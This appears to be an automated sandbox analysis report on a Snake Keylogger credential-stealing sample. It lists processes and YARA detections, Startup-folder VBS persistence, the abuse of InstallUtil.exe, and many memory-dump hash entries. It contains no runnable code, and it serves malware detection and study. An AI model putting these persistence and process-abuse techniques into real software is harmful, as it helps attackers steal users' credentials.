                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1830048122.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:14:04:14
                                              Start date:28/10/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                              Imagebase:0x990000
                                              File size:42'064 bytes
                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4215771932.0000000003054000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:5
                                              Start time:14:04:23
                                              Start date:28/10/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs"
                                              Imagebase:0x7ff7ba150000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:14:04:23
                                              Start date:28/10/2024
                                              Path:C:\Users\user\AppData\Roaming\RequiredContract.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\RequiredContract.exe"
                                              Imagebase:0xe40000
                                              File size:76'288 bytes
                                              MD5 hash:D998DA7BE623B6299E9257FCF5F80E3E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2012152493.000000000328F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 37%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Target ID:7
                                              Start time:14:04:32
                                              Start date:28/10/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                              Imagebase:0x7b0000
                                              File size:42'064 bytes
                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4215341701.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4215341701.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:false

                                              Reset < >
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'kq$TJpq$jjjjjj$$kq$$kq$$kq
                                                • API String ID: 0-3676134137
                                                • Opcode ID: 0c0538caa3365ee618640d9a6628ffcb6a1f4264bfb4311ceb898ca39a85565a
                                                • Instruction ID: 3e824e8f408f62c6db6140e48b7284093a9861d9a309ce60a1faeed45c42c26a
                                                • Opcode Fuzzy Hash: 0c0538caa3365ee618640d9a6628ffcb6a1f4264bfb4311ceb898ca39a85565a
                                                • Instruction Fuzzy Hash: 11E2277A250500EFDB4A9F98D948D55BBB2FF4D72471A85D8F20A9B232C732D861EF40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *)$TJpq$TJpq$jjjjjj$$kq$$kq
                                                • API String ID: 0-998880824
                                                • Opcode ID: 4819d2d3d28dbd2cbd19bb071dba0a21baaf0b7993ab684e41a328dd55f99488
                                                • Instruction ID: 3aec863259d6932229ae40a672798f68f3c402479d8da72a94c3254d7282db27
                                                • Opcode Fuzzy Hash: 4819d2d3d28dbd2cbd19bb071dba0a21baaf0b7993ab684e41a328dd55f99488
                                                • Instruction Fuzzy Hash: 3EE2277A250500EFDB4A9F98D948D55BBB2FF4D72471A85D8F20A9B232C732D861EF40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *)$TJpq$TJpq$jjjjjj$$kq$$kq
                                                • API String ID: 0-998880824
                                                • Opcode ID: f2481dbef01562eccf883da24f3dcbdf75b9fa485ae480a87904751164d2512c
                                                • Instruction ID: 5c889580217ca7a692618621252544622930c36e29c4b9085a67731bca4eaa4b
                                                • Opcode Fuzzy Hash: f2481dbef01562eccf883da24f3dcbdf75b9fa485ae480a87904751164d2512c
                                                • Instruction Fuzzy Hash: 0EB0929280F781DE8B024EA889C01607F24AEA228235DC4E6C4860E44BC0258687E332
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: d%qq$d%qq$$kq$$kq
                                                • API String ID: 0-2487373968
                                                • Opcode ID: c2eed270d33fc50548786b49f1e57a19743ac7596cf8557a50d2f7b89062e9b4
                                                • Instruction ID: 605872af6c7904ad79f9a8b481db1aa8205f97dddde2ae647641cbde39224766
                                                • Opcode Fuzzy Hash: c2eed270d33fc50548786b49f1e57a19743ac7596cf8557a50d2f7b89062e9b4
                                                • Instruction Fuzzy Hash: C761D330B05244CFCB189B798C9477A7AA6AF85300F24497AD4179B3E9DE3ADD42C792
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *)$TJpq
                                                • API String ID: 0-3541879849
                                                • Opcode ID: eefd21f1f7ba588a82a35da00ef6aa52511a6b12e3a97a03efd8773d4c7af398
                                                • Instruction ID: b5e07123e370ce401aade92bffa7da6a2d20f4a29e2c4d03cb45a46fc9ef952a
                                                • Opcode Fuzzy Hash: eefd21f1f7ba588a82a35da00ef6aa52511a6b12e3a97a03efd8773d4c7af398
                                                • Instruction Fuzzy Hash: 0351D4347006448FCB15DF78CA54AAEBBB2BF85724F148589E5568B3F1CB31AD0ADB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *)$TJpq
                                                • API String ID: 0-3541879849
                                                • Opcode ID: 393331ccdc372f4f5cb751fa410399946a25174c41a951f09850c185f7cf4bc9
                                                • Instruction ID: ee4131011a1eb07b333210eb550d1a710cfbaed40ef1ea576bb2591281c4b851
                                                • Opcode Fuzzy Hash: 393331ccdc372f4f5cb751fa410399946a25174c41a951f09850c185f7cf4bc9
                                                • Instruction Fuzzy Hash: 41517A747106008FCB24DF69C958A6EB7F2BF88728F218699E516DB3F1CB30AC058B55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Tekq
                                                • API String ID: 0-2319236580
                                                • Opcode ID: 0aed5090b1dfca60932fa1c07a8ea0c79c538a5d7cfe57c50f7d0d9f71a6dead
                                                • Instruction ID: 147fca5071976667241261bf79b9cd451a885793c4d488543135634b098eae0a
                                                • Opcode Fuzzy Hash: 0aed5090b1dfca60932fa1c07a8ea0c79c538a5d7cfe57c50f7d0d9f71a6dead
                                                • Instruction Fuzzy Hash: 8C316E30B002549FDB14DFB9C559ADEBBF2AF89710F148469E802AB3A5DF759D02CB90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Tekq
                                                • API String ID: 0-2319236580
                                                • Opcode ID: 25a84ce6bb45360e183144ea5df80f987696650e860ecf77780728ed8d67ae06
                                                • Instruction ID: c108690ae0f5c03df3bad1111fb0df296c5fc29c68d2b05362857f16b5620b9e
                                                • Opcode Fuzzy Hash: 25a84ce6bb45360e183144ea5df80f987696650e860ecf77780728ed8d67ae06
                                                • Instruction Fuzzy Hash: E9310534B41214CFDB18DBA9C458BAEBBB2BF49704F1444A9E817DB3A0CB75AC42CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Tekq
                                                • API String ID: 0-2319236580
                                                • Opcode ID: ac300663eaf7ff74a2a8bc880e32adb4fe340036943212284dc0c825693ed7df
                                                • Instruction ID: 60de8640ffff3388175202febb23444957ef8288e98bde241f86cca3c8bcb5e0
                                                • Opcode Fuzzy Hash: ac300663eaf7ff74a2a8bc880e32adb4fe340036943212284dc0c825693ed7df
                                                • Instruction Fuzzy Hash: 5211AF30E402088FEB14DBA8C9697DE7BF2AF88300F148029D803B73A5DF785945CBA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Tekq
                                                • API String ID: 0-2319236580
                                                • Opcode ID: c7a08a324cea6e385b53ee1fd8e29eefed6452e91afe4f11322fadb28aff8b63
                                                • Instruction ID: 1fd6fc99f76f6a7bd4eccc056f6b8df543dc8c1a90ec8225d5d1ddc8b87063c2
                                                • Opcode Fuzzy Hash: c7a08a324cea6e385b53ee1fd8e29eefed6452e91afe4f11322fadb28aff8b63
                                                • Instruction Fuzzy Hash: 0E118E30E002188BEB14DB68C4597DEBBF2AF88300F148029D502B7395DF745944CBA5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07789c57a7178dff5ccc862c31a2d53b29286e0219f3dcbce2f533e693447511
                                                • Instruction ID: 9834838cbefd2c2bf3e6fd37a016adfaf490ae23b70e3a1ae837b749618faea2
                                                • Opcode Fuzzy Hash: 07789c57a7178dff5ccc862c31a2d53b29286e0219f3dcbce2f533e693447511
                                                • Instruction Fuzzy Hash: A4424BB4906604CFE740DF08DA98A58BBF6FB01305F56C5A6D5168F3A6E3B5D888DF80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6617a681b21ab0f895f755997629b66f2045353ff201b0926fdcb0eb1c9f0262
                                                • Instruction ID: 7a3b766f76fcaa48d5f9a7ea5b19486145be281dd26a53ad09a61b1d3c1246fa
                                                • Opcode Fuzzy Hash: 6617a681b21ab0f895f755997629b66f2045353ff201b0926fdcb0eb1c9f0262
                                                • Instruction Fuzzy Hash: 6D120BB4D46600CFE750DF08DA58A58BBE6FB01305F46C4AAD5168F3A6E3B6D988DF40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8b75a0e1a69e3856ae949527732eb09a52c2c46980d13750755fb71695f981cc
                                                • Instruction ID: 58e891294ac17ab246a1447d1788cf7c12ce2cc5e3c78b0602dbce9683f94200
                                                • Opcode Fuzzy Hash: 8b75a0e1a69e3856ae949527732eb09a52c2c46980d13750755fb71695f981cc
                                                • Instruction Fuzzy Hash: F4F11BB4D46600CFE750DF08DA58E58BBE6BB01304F45C4AAD5168F3A6E3BAD988DF40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e4fb6b9ca071689bdfd23568986b568e0f0ce4b9eda7e0368a5adc4804d0d0a9
                                                • Instruction ID: 9909586a102a57801549df35f61f455f4715752817655da0c33dd10ed594b923
                                                • Opcode Fuzzy Hash: e4fb6b9ca071689bdfd23568986b568e0f0ce4b9eda7e0368a5adc4804d0d0a9
                                                • Instruction Fuzzy Hash: D4B1AD30E05149CFCF05DFA8D990AEEBBB2FF45300F1584A9D906AB352D731AA96CB51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76cf5847f9770156694e4c1be62d7c4ec966a47df0a0d31b6f89814b8b4006fe
                                                • Instruction ID: 2c5ead39233bcfb67bef3e5d490a275e147912e915cd84d0bb16f604fd2b5546
                                                • Opcode Fuzzy Hash: 76cf5847f9770156694e4c1be62d7c4ec966a47df0a0d31b6f89814b8b4006fe
                                                • Instruction Fuzzy Hash: 82518A70A05600CFDB28DF69C45076AB7F5FB4A300F048AABE44B87790D774E986DB82
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 87200262e1615ad6101f53562e94396f6b8f2eb7d614d3a03d93301afb4c5cea
                                                • Instruction ID: 59aa2077f1feae27bf334bd4db88b0feaa100347ed8c278ab741385421a7e0de
                                                • Opcode Fuzzy Hash: 87200262e1615ad6101f53562e94396f6b8f2eb7d614d3a03d93301afb4c5cea
                                                • Instruction Fuzzy Hash: 45419330B012098FCF58DB69D5146BF77A6EBC6340B2489A5D50B87398EF34DD42D791
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 296a69bc4ddb50e09ceefd3c5d3a844b456bfcecf7ac387d8968cb540e580239
                                                • Instruction ID: e32400eae0b83b335bb15054741f7d6df2b13645327efa63d629bd1b8cf9d1e0
                                                • Opcode Fuzzy Hash: 296a69bc4ddb50e09ceefd3c5d3a844b456bfcecf7ac387d8968cb540e580239
                                                • Instruction Fuzzy Hash: 3C4189B0C052889FCB11DFA9C594AEEBFF5EF49300F14846AE446AB3A4CB309945CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d9a5338e445268d08dcc481fb9d2b9d99a1dd3a1991909b3594d65bab9b2dd5
                                                • Instruction ID: 74367b88e8712210c3e54325e4b593becdf45a8e6fe6416246d541584cceed98
                                                • Opcode Fuzzy Hash: 3d9a5338e445268d08dcc481fb9d2b9d99a1dd3a1991909b3594d65bab9b2dd5
                                                • Instruction Fuzzy Hash: 93410434A06109CFCB09CB59C4A4AAEB7BBFF89300F19C566DC579B255C734A886CF51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 242320b08e98b1fa096ad77dc695c0e013decc1692007a5932863b06074d90b9
                                                • Instruction ID: 59a86fb681bc1e8d3e34ac4d48c4dae1876a3656f4fa0e13253d325186bf2c3f
                                                • Opcode Fuzzy Hash: 242320b08e98b1fa096ad77dc695c0e013decc1692007a5932863b06074d90b9
                                                • Instruction Fuzzy Hash: 70317AB0D052489FCF10DFA9C684ADEBFF5AF49310F248459E449AB394DB349945CF90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91318256b1fe419dbc8b2152a7f43344017e39f1ebb35d56c1fe82664956cab3
                                                • Instruction ID: b45412f8c12f1cad10aa4a261b7775e8bd5ff5d8d92a7c20ed461378990a6a72
                                                • Opcode Fuzzy Hash: 91318256b1fe419dbc8b2152a7f43344017e39f1ebb35d56c1fe82664956cab3
                                                • Instruction Fuzzy Hash: A431C130B012048FCF18DA38E6556BE77B2EBC7240B1888E5C80B87358E7309D43EB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6792401bead6a3dee64794d96c4b587bffd5f1b1cb8d9118fb8162695c55e662
                                                • Instruction ID: bca089407f81b66055849cbbee995023f89fd0cc70b52b7dd8f5882e531b58d9
                                                • Opcode Fuzzy Hash: 6792401bead6a3dee64794d96c4b587bffd5f1b1cb8d9118fb8162695c55e662
                                                • Instruction Fuzzy Hash: A521323130A2419FEF648A38D8443AE3B95EB42354F140ABAE05FC67C0E7B0CC82E740
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 469e15507010eb71ada624d39faa6bb697b993fc34fa7ee19f25bf1b58628912
                                                • Instruction ID: ee62ed5dcd057f068504d3f3047b5a2f4ccda8272364cd907274aed22ac7845c
                                                • Opcode Fuzzy Hash: 469e15507010eb71ada624d39faa6bb697b993fc34fa7ee19f25bf1b58628912
                                                • Instruction Fuzzy Hash: D1212830B012554FC702DBB8D9A56EF7BF1FF8521071484AAD806DB366EA749E06CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 712360bc6efa68f0c8e20e6387a49d534a91f6740b9ab384123038a5badb0a7d
                                                • Instruction ID: a213617ca354ab3363fba00a10115fbf8dd9a7b28b9ea9c230333acd6232cdc7
                                                • Opcode Fuzzy Hash: 712360bc6efa68f0c8e20e6387a49d534a91f6740b9ab384123038a5badb0a7d
                                                • Instruction Fuzzy Hash: 11317E70D06208DFDB05DFAAD4087AEBBF1EB85318F04C0A9E40297395E7795A89CF51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ad5a3826b0220178bf225c18aa32a645bd52f280835b7c8fa2d50d8fb6734e53
                                                • Instruction ID: 997d2cca9d4e25980c4fa384401551b1d59666762670fd1ec98c2951f4c23660
                                                • Opcode Fuzzy Hash: ad5a3826b0220178bf225c18aa32a645bd52f280835b7c8fa2d50d8fb6734e53
                                                • Instruction Fuzzy Hash: 92318E70E02208DFDB04DFAAD4087AEB7F1EB89314F00C0A4E50697394EB7A5A89CF50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 93aa0e28a60d0f210ef3cee8365646393d3ec6ca59e1196614cbe55df88ab2c4
                                                • Instruction ID: 10b614c6fadd56d637df5e5f087f0cea38abda3db17add711a29b6ebd25af90f
                                                • Opcode Fuzzy Hash: 93aa0e28a60d0f210ef3cee8365646393d3ec6ca59e1196614cbe55df88ab2c4
                                                • Instruction Fuzzy Hash: 083135B0D052489FDB10DFA9C680ADEBFF9AF48300F248429E509AB354CB749945CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1828787662.000000000261D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0261D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_261d000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e05c5d0aedfa5a901d59608385520fe6d16aa9295cb62addb2826ff982d097a
                                                • Instruction ID: 328b4cab5ca615467aca76bd6dbb8e6b16d633479f7a539b827c2c5c526cf985
                                                • Opcode Fuzzy Hash: 5e05c5d0aedfa5a901d59608385520fe6d16aa9295cb62addb2826ff982d097a
                                                • Instruction Fuzzy Hash: 92212571504280DFDB14DF14D9C4B27BF65FB88314F28C169D8094B346C336E417CAA2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1828787662.000000000261D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0261D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_261d000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
